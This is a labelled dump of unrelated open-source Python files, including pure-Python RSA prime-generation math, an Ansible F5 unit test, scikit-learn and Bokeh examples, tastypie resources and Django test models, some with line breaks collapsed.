try: devRandomFile = open("/dev/urandom", "rb") def getRandomBytes(howMany): return stringToBytes(devRandomFile.read(howMany)) prngName = "/dev/urandom" except IOError: #Else get Win32 CryptoAPI PRNG try: import win32prng def getRandomBytes(howMany): s = win32prng.getRandomBytes(howMany) if len(s) != howMany: raise AssertionError() return stringToBytes(s) prngName ="CryptoAPI" except ImportError: #Else no PRNG :-( def getRandomBytes(howMany): raise NotImplementedError("No Random Number Generator "\ "available.") prngName = "None" # ************************************************************************** # Converter Functions # ************************************************************************** def bytesToNumber(bytes): total = 0L multiplier = 1L for count in range(len(bytes)-1, -1, -1): byte = bytes[count] total += multiplier * byte multiplier *= 256 return total def numberToBytes(n): howManyBytes = numBytes(n) bytes = createByteArrayZeros(howManyBytes) for count in range(howManyBytes-1, -1, -1): bytes[count] = int(n % 256) n >>= 8 return bytes def bytesToBase64(bytes): s = bytesToString(bytes) return stringToBase64(s) def base64ToBytes(s): s = base64ToString(s) return stringToBytes(s) def numberToBase64(n): bytes = numberToBytes(n) return bytesToBase64(bytes) def base64ToNumber(s): bytes = base64ToBytes(s) return bytesToNumber(bytes) def stringToNumber(s): bytes = stringToBytes(s) return bytesToNumber(bytes) def numberToString(s): bytes = numberToBytes(s) return bytesToString(bytes) def base64ToString(s): try: return base64.decodestring(s) except binascii.Error, e: raise SyntaxError(e) except binascii.Incomplete, e: raise SyntaxError(e) def stringToBase64(s): return base64.encodestring(s).replace("\n", "") def mpiToNumber(mpi): #mpi is an openssl-format bignum string if (ord(mpi[4]) & 0x80) !=0: #Make sure this is a positive number raise AssertionError() bytes = stringToBytes(mpi[4:]) return bytesToNumber(bytes) def numberToMPI(n): bytes = 
numberToBytes(n) ext = 0 #If the high-order bit is going to be set, #add an extra byte of zeros if (numBits(n) & 0x7)==0: ext = 1 length = numBytes(n) + ext bytes = concatArrays(createByteArrayZeros(4+ext), bytes) bytes[0] = (length >> 24) & 0xFF bytes[1] = (length >> 16) & 0xFF bytes[2] = (length >> 8) & 0xFF bytes[3] = length & 0xFF return bytesToString(bytes) # ************************************************************************** # Misc. Utility Functions # ************************************************************************** def numBytes(n): if n==0: return 0 bits = numBits(n) return int(math.ceil(bits / 8.0)) def hashAndBase64(s): return stringToBase64(sha.sha(s).digest()) def getBase64Nonce(numChars=22): #defaults to an 132 bit nonce bytes = getRandomBytes(numChars) bytesStr = "".join([chr(b) for b in bytes]) return stringToBase64(bytesStr)[:numChars] # ************************************************************************** # Big Number Math # ************************************************************************** def getRandomNumber(low, high): if low >= high: raise AssertionError() howManyBits = numBits(high) howManyBytes = numBytes(high) lastBits = howManyBits % 8 while 1: bytes = getRandomBytes(howManyBytes) if lastBits: bytes[0] = bytes[0] % (1 << lastBits) n = bytesToNumber(bytes) if n >= low and n < high: return n def gcd(a,b): a, b = max(a,b), min(a,b) while b: a, b = b, a % b return a def lcm(a, b): #This will break when python division changes, but we can't use // cause #of Jython return (a * b) / gcd(a, b) #Returns inverse of a mod b, zero if none #Uses Extended Euclidean Algorithm def invMod(a, b): c, d = a, b uc, ud = 1, 0 while c != 0: #This will break when python division changes, but we can't use // #cause of Jython q = d / c c, d = d-(q*c), c uc, ud = ud - (q * uc), uc if d == 1: return ud % b return 0 if gmpyLoaded: def powMod(base, power, modulus): base = gmpy.mpz(base) power = gmpy.mpz(power) modulus = gmpy.mpz(modulus) 
result = pow(base, power, modulus) return long(result) else: #Copied from Bryan G. Olson's post to comp.lang.python #Does left-to-right instead of pow()'s right-to-left, #thus about 30% faster than the python built-in with small bases def powMod(base, power, modulus): nBitScan = 5 """ Return base**power mod modulus, using multi bit scanning with nBitScan bits at a time.""" #TREV - Added support for negative exponents negativeResult = False if (power < 0): power *= -1 negativeResult = True exp2 = 2**nBitScan mask = exp2 - 1 # Break power into a list of digits of nBitScan bits. # The list is recursive so easy to read in reverse direction. nibbles = None while power: nibbles = int(power & mask), nibbles power = power >> nBitScan # Make a table of powers of base up to 2**nBitScan - 1 lowPowers = [1] for i in xrange(1, exp2): lowPowers.append((lowPowers[i-1] * base) % modulus) # To exponentiate by the first nibble, look it up in the table nib, nibbles = nibbles prod = lowPowers[nib] # For the rest, square nBitScan times, then multiply by # base^nibble while nibbles: nib, nibbles = nibbles for i in xrange(nBitScan): prod = (prod * prod) % modulus if nib: prod = (prod * lowPowers[nib]) % modulus #TREV - Added support for negative exponents if negativeResult: prodInv = invMod(prod, modulus) #Check to make sure the inverse is correct if (prod * prodInv) % modulus != 1: raise AssertionError() return prodInv return prod #Pre-calculate a sieve of the ~100 primes < 1000: def makeSieve(n): sieve = range(n) for count in range(2, int(math.sqrt(n))): if sieve[count] == 0: continue x = sieve[count] * 2 while x < len(sieve): sieve[x] = 0 x += sieve[count] sieve = [x for x in sieve[2:] if x] return sieve sieve = makeSieve(1000) def isPrime(n, iterations=5, display=False): #Trial division with sieve for x in sieve: if x >= n: return True if n % x == 0: return False #Passed trial division, proceed to Rabin-Miller #Rabin-Miller implemented per Ferguson & Schneier #Compute s, t for 
Rabin-Miller if display: print "*", s, t = n-1, 0 while s % 2 == 0: s, t = s/2, t+1 #Repeat Rabin-Miller x times a = 2 #Use 2 as a base for first iteration speedup, per HAC for count in range(iterations): v = powMod(a, s, n) if v==1: continue i = 0 while v != n-1: if i == t-1: return False else: v, i = powMod(v, 2, n), i+1 a = getRandomNumber(2, n) return True def getRandomPrime(bits, display=False): if bits < 10: raise AssertionError() #The 1.5 ensures the 2 MSBs are set #Thus, when used for p,q in RSA, n will have its MSB set # #Since 30 is lcm(2,3,5), we'll set our test numbers to #29 % 30 and keep them there low = (2L ** (bits-1)) * 3/2 high = 2L ** bits - 30 p = getRandomNumber(low, high) p += 29 - (p % 30) while 1: if display: print ".", p += 30 if p >= high: p = getRandomNumber(low, high) p += 29 - (p % 30) if isPrime(p, display=display): return p #Unused at the moment... def getRandomSafePrime(bits, display=False): if bits < 10: raise AssertionError() #The 1.5 ensures the 2 MSBs are set #Thus, when used for p,q in RSA, n will have its MSB set # #Since 30 is lcm(2,3,5), we'll set our test numbers to #29 % 30 and keep them there low = (2 ** (bits-2)) * 3/2 high = (2 ** (bits-1)) - 30 q = getRandomNumber(low, high) q += 29 - (q % 30) while 1: if display: print ".", q += 30 if (q >= high): q = getRandomNumber(low, high) q += 29 - (q % 30) #Ideas from Tom Wu's SRP code #Do trial division on p and q before Rabin-Miller if isPrime(q, 0, display=display): p = (2 * q) + 1 if isPrime(p, display=display): if isPrime(q, display=display): return p
chouseknecht/ansible
refs/heads/devel
test/units/modules/network/f5/test_bigip_iapp_template.py
22
# -*- coding: utf-8 -*- # # Copyright (c) 2017 F5 Networks Inc. # GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import json import pytest import sys if sys.version_info < (2, 7): pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7") from ansible.module_utils.basic import AnsibleModule try: from library.modules.bigip_iapp_template import Parameters from library.modules.bigip_iapp_template import ModuleManager from library.modules.bigip_iapp_template import ArgumentSpec # In Ansible 2.8, Ansible changed import paths. from test.units.compat import unittest from test.units.compat.mock import Mock from test.units.modules.utils import set_module_args except ImportError: from ansible.modules.network.f5.bigip_iapp_template import Parameters from ansible.modules.network.f5.bigip_iapp_template import ArgumentSpec from ansible.modules.network.f5.bigip_iapp_template import ModuleManager # Ansible 2.8 imports from units.compat import unittest from units.compat.mock import Mock from units.modules.utils import set_module_args fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures') fixture_data = {} def load_fixture(name): path = os.path.join(fixture_path, name) if path in fixture_data: return fixture_data[path] with open(path) as f: data = f.read() try: data = json.loads(data) except Exception: pass fixture_data[path] = data return data class TestParameters(unittest.TestCase): def test_module_parameters(self): iapp = load_fixture('create_iapp_template.iapp') args = dict( content=iapp ) p = Parameters(params=args) assert p.name == 'foo.iapp' def test_module_parameters_custom_name(self): iapp = load_fixture('create_iapp_template.iapp') args = dict( content=iapp, name='foobar' ) p = Parameters(params=args) assert p.name == 'foobar' assert 'sys application template /Common/foobar' in p.content def 
test_module_parameters_custom_partition(self): iapp = load_fixture('create_iapp_template.iapp') args = dict( content=iapp, partition='foobar' ) p = Parameters(params=args) assert p.name == 'foo.iapp' assert 'sys application template /foobar/foo.iapp' in p.content class TestManager(unittest.TestCase): def setUp(self): self.spec = ArgumentSpec() def test_create_iapp_template(self, *args): # Configure the arguments that would be sent to the Ansible module set_module_args(dict( content=load_fixture('basic-iapp.tmpl'), provider=dict( server='localhost', password='password', user='admin' ) )) module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) mm = ModuleManager(module=module) # Override methods to force specific logic in the module to happen mm.exists = Mock(side_effect=[False, True]) mm.create_on_device = Mock(return_value=True) results = mm.exec_module() assert results['changed'] is True def test_update_iapp_template(self, *args): # Configure the arguments that would be sent to the Ansible module set_module_args(dict( content=load_fixture('basic-iapp.tmpl'), provider=dict( server='localhost', password='password', user='admin' ) )) current1 = Parameters(params=load_fixture('load_sys_application_template_w_new_checksum.json')) current2 = Parameters(params=load_fixture('load_sys_application_template_w_old_checksum.json')) module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) mm = ModuleManager(module=module) # Override methods to force specific logic in the module to happen mm.exists = Mock(side_effect=[True, True]) mm.create_on_device = Mock(return_value=True) mm.read_current_from_device = Mock(return_value=current1) mm.template_in_use = Mock(return_value=False) mm._get_temporary_template = Mock(return_value=current2) mm._remove_iapp_checksum = Mock(return_value=None) mm._generate_template_checksum_on_device = Mock(return_value=None) results = 
mm.exec_module() assert results['changed'] is True def test_delete_iapp_template(self, *args): set_module_args(dict( content=load_fixture('basic-iapp.tmpl'), state='absent', provider=dict( server='localhost', password='password', user='admin' ) )) module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) mm = ModuleManager(module=module) # Override methods to force specific logic in the module to happen mm.exists = Mock(side_effect=[True, False]) mm.remove_from_device = Mock(return_value=True) results = mm.exec_module() assert results['changed'] is True def test_delete_iapp_template_idempotent(self, *args): set_module_args(dict( content=load_fixture('basic-iapp.tmpl'), state='absent', provider=dict( server='localhost', password='password', user='admin' ) )) module = AnsibleModule( argument_spec=self.spec.argument_spec, supports_check_mode=self.spec.supports_check_mode ) mm = ModuleManager(module=module) # Override methods to force specific logic in the module to happen mm.exists = Mock(side_effect=[False, False]) results = mm.exec_module() assert results['changed'] is False
dghubble/pyrepo
refs/heads/master
pyrepo/hosts.py
1
# -*- coding: utf-8 -*-
"""
This module provides the repository Host type and common Host objects
(github_host, bitbucket_host).
"""

import re


class Host(object):
    """
    Represents a host of repositories and how import_path identifiers of
    repositories are mapped to the host's urls.
    """

    def __init__(self, command_name_func=None, **kwargs):
        """
        :param str name: name of the repository host
        :param str prefix: prefix to matching import paths should have
        :param str pattern: regex pattern for the import path
        :param str command_name: name of the command for interacting with
            hosted repositories; may be omitted when `command_name_func`
            is given
        :param func command_name_func: func(`import_path`) which returns
            the str name of a command to be used for the host's
            `import_path` repository. May raise `ImportPathError`.
            Defaults to None and `command_name` is used directly.
        :param str url_format: format string for the repository url, which
            should contain a `import_path` format specifier.
        :raises: ValueError if both `command_name` and `command_name_func`
            are None
        """
        self.name = kwargs["name"]
        self.prefix = kwargs["prefix"]
        self.pattern = re.compile(kwargs["pattern"])
        # .get(): callers relying solely on `command_name_func` should not
        # have to pass command_name=None explicitly (a plain ["command_name"]
        # lookup raised KeyError before the both-None check could run).
        self.command_name = kwargs.get("command_name")
        self.command_name_func = command_name_func
        self.url_format = kwargs["url_format"]
        if self.command_name_func is None and self.command_name is None:
            raise ValueError(("Host {0} `command_name` and"
                              "`command_name_func` cannot both be None")
                             .format(self.name))


#: github.com repository host definition
# NOTE: patterns are raw strings; "\." / "\-" in plain literals are invalid
# escape sequences (DeprecationWarning, SyntaxWarning on newer Pythons).
github_host = Host(
    name="Github",
    prefix="github.com/",
    pattern=r"^(?P<repo_root>github\.com/[A-Za-z0-9_.\-]+/[A-Za-z0-9_.\-]+)(/[A-Za-z0-9_.\-]+)*$",
    command_name="git",
    url_format="https://{import_path}")

#: bitbucket.org repository host definition
bitbucket_host = Host(
    name="Bitbucket",
    prefix="bitbucket.org/",
    pattern=r"^(?P<repo_root>bitbucket\.org/(?P<bitname>[A-Za-z0-9_.\-]+/[A-Za-z0-9_.\-]+))(/[A-Za-z0-9_.\-]+)*$",
    command_name="git",
    url_format="https://{import_path}")

#: default set of repository hosts
default_hosts = [github_host, bitbucket_host]
lupyuen/RaspberryPiImage
refs/heads/master
home/pi/GrovePi/Software/Python/others/temboo/Library/Google/Gmailv2/Messages/__init__.py
4
from temboo.Library.Google.Gmailv2.Messages.ClearStoredHistory import ClearStoredHistory, ClearStoredHistoryInputSet, ClearStoredHistoryResultSet, ClearStoredHistoryChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.DeleteMessage import DeleteMessage, DeleteMessageInputSet, DeleteMessageResultSet, DeleteMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.GetLatestMessage import GetLatestMessage, GetLatestMessageInputSet, GetLatestMessageResultSet, GetLatestMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.GetMessage import GetMessage, GetMessageInputSet, GetMessageResultSet, GetMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.GetNextMessage import GetNextMessage, GetNextMessageInputSet, GetNextMessageResultSet, GetNextMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.InsertMessage import InsertMessage, InsertMessageInputSet, InsertMessageResultSet, InsertMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.ListMessages import ListMessages, ListMessagesInputSet, ListMessagesResultSet, ListMessagesChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.ModifyMessage import ModifyMessage, ModifyMessageInputSet, ModifyMessageResultSet, ModifyMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.SendMessage import SendMessage, SendMessageInputSet, SendMessageResultSet, SendMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.TrashMessage import TrashMessage, TrashMessageInputSet, TrashMessageResultSet, TrashMessageChoreographyExecution from temboo.Library.Google.Gmailv2.Messages.UnTrashMessage import UnTrashMessage, UnTrashMessageInputSet, UnTrashMessageResultSet, UnTrashMessageChoreographyExecution
roxyboy/scikit-learn
refs/heads/master
benchmarks/bench_20newsgroups.py
377
from __future__ import print_function, division
from time import time
import argparse
import numpy as np

from sklearn.dummy import DummyClassifier

from sklearn.datasets import fetch_20newsgroups_vectorized
from sklearn.metrics import accuracy_score
from sklearn.utils.validation import check_array

from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import MultinomialNB

# Candidate classifiers, keyed by the name accepted via -e/--estimators.
ESTIMATORS = {
    "dummy": DummyClassifier(),
    "random_forest": RandomForestClassifier(n_estimators=100,
                                            max_features="sqrt",
                                            min_samples_split=10),
    "extra_trees": ExtraTreesClassifier(n_estimators=100,
                                        max_features="sqrt",
                                        min_samples_split=10),
    "logistic_regression": LogisticRegression(),
    "naive_bayes": MultinomialNB(),
    "adaboost": AdaBoostClassifier(n_estimators=10),
}


###############################################################################
# Data

if __name__ == "__main__":

    parser = argparse.ArgumentParser()
    parser.add_argument('-e', '--estimators', nargs="+", required=True,
                        choices=ESTIMATORS)
    args = vars(parser.parse_args())

    data_train = fetch_20newsgroups_vectorized(subset="train")
    data_test = fetch_20newsgroups_vectorized(subset="test")
    # CSC for fitting, CSR for prediction — each matches the access pattern
    # the respective phase prefers.
    X_train = check_array(data_train.data, dtype=np.float32,
                          accept_sparse="csc")
    X_test = check_array(data_test.data, dtype=np.float32, accept_sparse="csr")
    y_train = data_train.target
    y_test = data_test.target

    print("20 newsgroups")
    print("=============")
    print("X_train.shape = {0}".format(X_train.shape))
    print("X_train.format = {0}".format(X_train.format))
    print("X_train.dtype = {0}".format(X_train.dtype))
    print("X_train density = {0}"
          "".format(X_train.nnz / np.product(X_train.shape)))
    print("y_train {0}".format(y_train.shape))
    print("X_test {0}".format(X_test.shape))
    print("X_test.format = {0}".format(X_test.format))
    print("X_test.dtype = {0}".format(X_test.dtype))
    print("y_test {0}".format(y_test.shape))
    print()
    print("Classifier Training")
    print("===================")
    accuracy, train_time, test_time = {}, {}, {}
    for name in sorted(args["estimators"]):
        clf = ESTIMATORS[name]
        try:
            # Fix the seed where the estimator supports it, for
            # reproducible timings and scores.
            clf.set_params(random_state=0)
        except (TypeError, ValueError):
            pass
        print("Training %s ... " % name, end="")
        t0 = time()
        clf.fit(X_train, y_train)
        train_time[name] = time() - t0
        t0 = time()
        y_pred = clf.predict(X_test)
        test_time[name] = time() - t0
        accuracy[name] = accuracy_score(y_test, y_pred)
        print("done")

    print()
    print("Classification performance:")
    print("===========================")
    print()
    print("%s %s %s %s" % ("Classifier ", "train-time", "test-time",
                           "Accuracy"))
    print("-" * 44)
    # Report rows ordered worst-to-best accuracy.
    for name in sorted(accuracy, key=accuracy.get):
        print("%s %s %s %s" % (name.ljust(16),
                               ("%.4fs" % train_time[name]).center(10),
                               ("%.4fs" % test_time[name]).center(10),
                               ("%.4f" % accuracy[name]).center(10)))

    print()
darkryder/django
refs/heads/master
tests/template_tests/filter_tests/test_upper.py
388
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.template.defaultfilters import upper from django.test import SimpleTestCase from django.utils.safestring import mark_safe from ..utils import setup class UpperTests(SimpleTestCase): """ The "upper" filter messes up entities (which are case-sensitive), so it's not safe for non-escaping purposes. """ @setup({'upper01': '{% autoescape off %}{{ a|upper }} {{ b|upper }}{% endautoescape %}'}) def test_upper01(self): output = self.engine.render_to_string('upper01', {'a': 'a & b', 'b': mark_safe('a &amp; b')}) self.assertEqual(output, 'A & B A &AMP; B') @setup({'upper02': '{{ a|upper }} {{ b|upper }}'}) def test_upper02(self): output = self.engine.render_to_string('upper02', {'a': 'a & b', 'b': mark_safe('a &amp; b')}) self.assertEqual(output, 'A &amp; B A &amp;AMP; B') class FunctionTests(SimpleTestCase): def test_upper(self): self.assertEqual(upper('Mixed case input'), 'MIXED CASE INPUT') def test_unicode(self): # lowercase e umlaut self.assertEqual(upper('\xeb'), '\xcb') def test_non_string_input(self): self.assertEqual(upper(123), '123')
pooya/disco
refs/heads/master
examples/faq/chain.py
11
from disco.job import Job
from disco.worker.task_io import chain_reader


class FirstJob(Job):
    # Seed job: two identical raw inputs, each carrying the string "0".
    input = ['raw://0', 'raw://0']

    @staticmethod
    def map(line, params):
        # Emit the incremented integer as the key with an empty value.
        yield int(line) + 1, ""


class ChainJob(Job):
    # Read the (key, value) results produced by the previous job in the
    # chain instead of raw input lines.
    map_reader = staticmethod(chain_reader)

    @staticmethod
    def map(key_value, params):
        # Increment the key again; pass the value through unchanged.
        yield int(key_value[0]) + 1, key_value[1]


if __name__ == "__main__":
    # Jobs cannot belong to __main__ modules. So, import this very
    # file to access the above classes.
    import chain
    last = chain.FirstJob().run()
    # Chain nine more jobs, each consuming the previous job's output.
    for i in range(9):
        last = chain.ChainJob().run(input=last.wait())
    print(last.name)
huongttlan/bokeh
refs/heads/master
tests/glyphs/Diamond.py
43
import numpy as np
from bokeh.document import Document
from bokeh.models import ColumnDataSource, DataRange1d, Plot, LinearAxis, Grid
from bokeh.models.markers import Diamond
from bokeh.plotting import show

# Sample data: N points on a parabola, with linearly increasing marker sizes.
N = 9
x = np.linspace(-2, 2, N)
y = x**2
sizes = np.linspace(10, 20, N)

source = ColumnDataSource(dict(x=x, y=y, sizes=sizes))

# Ranges auto-size to the glyph data.
xdr = DataRange1d()
ydr = DataRange1d()

plot = Plot(
    title=None, x_range=xdr, y_range=ydr, plot_width=300, plot_height=300,
    h_symmetry=False, v_symmetry=False, min_border=0, toolbar_location=None)

# Diamond markers sized per-point from the "sizes" column; outline only
# (no fill).
glyph = Diamond(x="x", y="y", size="sizes", line_color="#1c9099", line_width=2, fill_color=None)
plot.add_glyph(source, glyph)

xaxis = LinearAxis()
plot.add_layout(xaxis, 'below')

yaxis = LinearAxis()
plot.add_layout(yaxis, 'left')

# Grid lines tied to the axis tickers.
plot.add_layout(Grid(dimension=0, ticker=xaxis.ticker))
plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker))

doc = Document()
doc.add(plot)

show(plot)
glencoates/django-tastypie
refs/heads/master
tests/related_resource/api/resources.py
16
from django.contrib.auth.models import User
from tastypie import fields
from tastypie.resources import ModelResource
from tastypie.authorization import Authorization
from core.models import Note, MediaBit
from related_resource.models import Category, Tag, ExtraData, Taggable, TaggableTag


class UserResource(ModelResource):
    # Read-only user endpoint.
    class Meta:
        resource_name = 'users'
        queryset = User.objects.all()
        allowed_methods = ['get']


class NoteResource(ModelResource):
    # Each note points back at its authoring User.
    author = fields.ForeignKey(UserResource, 'author')

    class Meta:
        resource_name = 'notes'
        queryset = Note.objects.all()
        authorization = Authorization()


class CategoryResource(ModelResource):
    # Self-referential FK models a category tree; roots have parent=None.
    parent = fields.ToOneField('self', 'parent', null=True)

    class Meta:
        resource_name = 'category'
        queryset = Category.objects.all()
        authorization = Authorization()


class TagResource(ModelResource):
    # Reverse side of the Tag<->Taggable relation via the TaggableTag
    # through model; string paths avoid circular resource imports.
    taggabletags = fields.ToManyField(
        'related_resource.api.resources.TaggableTagResource', 'taggabletags',
        null=True)
    extradata = fields.ToOneField(
        'related_resource.api.resources.ExtraDataResource', 'extradata',
        null=True, blank=True, full=True)

    class Meta:
        resource_name = 'tag'
        queryset = Tag.objects.all()
        authorization = Authorization()


class TaggableResource(ModelResource):
    taggabletags = fields.ToManyField(
        'related_resource.api.resources.TaggableTagResource', 'taggabletags',
        null=True)

    class Meta:
        resource_name = 'taggable'
        queryset = Taggable.objects.all()
        authorization = Authorization()


class TaggableTagResource(ModelResource):
    # Explicit "through" resource joining TagResource and TaggableResource.
    tag = fields.ToOneField(
        'related_resource.api.resources.TagResource', 'tag',
        null=True)
    taggable = fields.ToOneField(
        'related_resource.api.resources.TaggableResource', 'taggable',
        null=True)

    class Meta:
        resource_name = 'taggabletag'
        queryset = TaggableTag.objects.all()
        authorization = Authorization()


class ExtraDataResource(ModelResource):
    tag = fields.ToOneField(
        'related_resource.api.resources.TagResource', 'tag',
        null=True)

    class Meta:
        resource_name = 'extradata'
        queryset = ExtraData.objects.all()
        authorization = Authorization()


class FreshNoteResource(ModelResource):
    # related_name='note' lets nested media bits resolve their parent note
    # when saved through this resource.
    media_bits = fields.ToManyField('related_resource.api.resources.FreshMediaBitResource',
                                    'media_bits', related_name='note')

    class Meta:
        queryset = Note.objects.all()
        resource_name = 'freshnote'
        authorization = Authorization()


class FreshMediaBitResource(ModelResource):
    note = fields.ToOneField(FreshNoteResource, 'note')

    class Meta:
        queryset = MediaBit.objects.all()
        resource_name = 'freshmediabit'
        authorization = Authorization()
roderickm/MediaCrush
refs/heads/master
migrate.py
2
from mediacrush.objects import File, RedisObject from mediacrush.database import r, _k from mediacrush.fileutils import file_storage from mediacrush.processing.invocation import Invocation from mediacrush.config import _cfg, _cfgi import sys import json if __name__ == '__main__': files = File.get_all() count = len(files) print "About to process %d files." % count done = 0 errors = [] for f in files: h = f.hash k = _k("file.%s" % h) r.hset(k, "ip", "") print "\n%d/%d files processed, errors:" % (done, count), errors def normalise_processor(processor): if not processor: return None return processor.split("/")[0] if "/" in processor else processor
yakky/django
refs/heads/master
tests/model_fields/models.py
210
import os import tempfile import uuid from django.contrib.contenttypes.fields import ( GenericForeignKey, GenericRelation, ) from django.contrib.contenttypes.models import ContentType from django.core.files.storage import FileSystemStorage from django.db import models from django.db.models.fields.files import ImageField, ImageFieldFile from django.db.models.fields.related import ( ForeignKey, ForeignObject, ManyToManyField, OneToOneField, ) from django.utils import six try: from PIL import Image except ImportError: Image = None class Foo(models.Model): a = models.CharField(max_length=10) d = models.DecimalField(max_digits=5, decimal_places=3) def get_foo(): return Foo.objects.get(id=1).pk class Bar(models.Model): b = models.CharField(max_length=10) a = models.ForeignKey(Foo, models.CASCADE, default=get_foo, related_name=b'bars') class Whiz(models.Model): CHOICES = ( ('Group 1', ( (1, 'First'), (2, 'Second'), ) ), ('Group 2', ( (3, 'Third'), (4, 'Fourth'), ) ), (0, 'Other'), ) c = models.IntegerField(choices=CHOICES, null=True) class Counter(six.Iterator): def __init__(self): self.n = 1 def __iter__(self): return self def __next__(self): if self.n > 5: raise StopIteration else: self.n += 1 return (self.n, 'val-' + str(self.n)) class WhizIter(models.Model): c = models.IntegerField(choices=Counter(), null=True) class WhizIterEmpty(models.Model): c = models.CharField(choices=(x for x in []), blank=True, max_length=1) class BigD(models.Model): d = models.DecimalField(max_digits=38, decimal_places=30) class FloatModel(models.Model): size = models.FloatField() class BigS(models.Model): s = models.SlugField(max_length=255) class UnicodeSlugField(models.Model): s = models.SlugField(max_length=255, allow_unicode=True) class SmallIntegerModel(models.Model): value = models.SmallIntegerField() class IntegerModel(models.Model): value = models.IntegerField() class BigIntegerModel(models.Model): value = models.BigIntegerField() null_value = models.BigIntegerField(null=True, 
blank=True) class PositiveSmallIntegerModel(models.Model): value = models.PositiveSmallIntegerField() class PositiveIntegerModel(models.Model): value = models.PositiveIntegerField() class Post(models.Model): title = models.CharField(max_length=100) body = models.TextField() class NullBooleanModel(models.Model): nbfield = models.NullBooleanField() class BooleanModel(models.Model): bfield = models.BooleanField(default=None) string = models.CharField(max_length=10, default='abc') class DateTimeModel(models.Model): d = models.DateField() dt = models.DateTimeField() t = models.TimeField() class DurationModel(models.Model): field = models.DurationField() class NullDurationModel(models.Model): field = models.DurationField(null=True) class PrimaryKeyCharModel(models.Model): string = models.CharField(max_length=10, primary_key=True) class FksToBooleans(models.Model): """Model with FKs to models with {Null,}BooleanField's, #15040""" bf = models.ForeignKey(BooleanModel, models.CASCADE) nbf = models.ForeignKey(NullBooleanModel, models.CASCADE) class FkToChar(models.Model): """Model with FK to a model with a CharField primary key, #19299""" out = models.ForeignKey(PrimaryKeyCharModel, models.CASCADE) class RenamedField(models.Model): modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),)) class VerboseNameField(models.Model): id = models.AutoField("verbose pk", primary_key=True) field1 = models.BigIntegerField("verbose field1") field2 = models.BooleanField("verbose field2", default=False) field3 = models.CharField("verbose field3", max_length=10) field4 = models.CommaSeparatedIntegerField("verbose field4", max_length=99) field5 = models.DateField("verbose field5") field6 = models.DateTimeField("verbose field6") field7 = models.DecimalField("verbose field7", max_digits=6, decimal_places=1) field8 = models.EmailField("verbose field8") field9 = models.FileField("verbose field9", upload_to="unused") field10 = models.FilePathField("verbose field10") field11 = 
models.FloatField("verbose field11") # Don't want to depend on Pillow in this test # field_image = models.ImageField("verbose field") field12 = models.IntegerField("verbose field12") field13 = models.GenericIPAddressField("verbose field13", protocol="ipv4") field14 = models.NullBooleanField("verbose field14") field15 = models.PositiveIntegerField("verbose field15") field16 = models.PositiveSmallIntegerField("verbose field16") field17 = models.SlugField("verbose field17") field18 = models.SmallIntegerField("verbose field18") field19 = models.TextField("verbose field19") field20 = models.TimeField("verbose field20") field21 = models.URLField("verbose field21") field22 = models.UUIDField("verbose field22") field23 = models.DurationField("verbose field23") class GenericIPAddress(models.Model): ip = models.GenericIPAddressField(null=True, protocol='ipv4') ############################################################################### # These models aren't used in any test, just here to ensure they validate # successfully. # See ticket #16570. class DecimalLessThanOne(models.Model): d = models.DecimalField(max_digits=3, decimal_places=3) # See ticket #18389. class FieldClassAttributeModel(models.Model): field_class = models.CharField ############################################################################### class DataModel(models.Model): short_data = models.BinaryField(max_length=10, default=b'\x08') data = models.BinaryField() ############################################################################### # FileField class Document(models.Model): myfile = models.FileField(upload_to='unused') ############################################################################### # ImageField # If Pillow available, do these tests. if Image: class TestImageFieldFile(ImageFieldFile): """ Custom Field File class that records whether or not the underlying file was opened. 
""" def __init__(self, *args, **kwargs): self.was_opened = False super(TestImageFieldFile, self).__init__(*args, **kwargs) def open(self): self.was_opened = True super(TestImageFieldFile, self).open() class TestImageField(ImageField): attr_class = TestImageFieldFile # Set up a temp directory for file storage. temp_storage_dir = tempfile.mkdtemp() temp_storage = FileSystemStorage(temp_storage_dir) temp_upload_to_dir = os.path.join(temp_storage.location, 'tests') class Person(models.Model): """ Model that defines an ImageField with no dimension fields. """ name = models.CharField(max_length=50) mugshot = TestImageField(storage=temp_storage, upload_to='tests') class AbsctractPersonWithHeight(models.Model): """ Abstract model that defines an ImageField with only one dimension field to make sure the dimension update is correctly run on concrete subclass instance post-initialization. """ mugshot = TestImageField(storage=temp_storage, upload_to='tests', height_field='mugshot_height') mugshot_height = models.PositiveSmallIntegerField() class Meta: abstract = True class PersonWithHeight(AbsctractPersonWithHeight): """ Concrete model that subclass an abctract one with only on dimension field. """ name = models.CharField(max_length=50) class PersonWithHeightAndWidth(models.Model): """ Model that defines height and width fields after the ImageField. """ name = models.CharField(max_length=50) mugshot = TestImageField(storage=temp_storage, upload_to='tests', height_field='mugshot_height', width_field='mugshot_width') mugshot_height = models.PositiveSmallIntegerField() mugshot_width = models.PositiveSmallIntegerField() class PersonDimensionsFirst(models.Model): """ Model that defines height and width fields before the ImageField. 
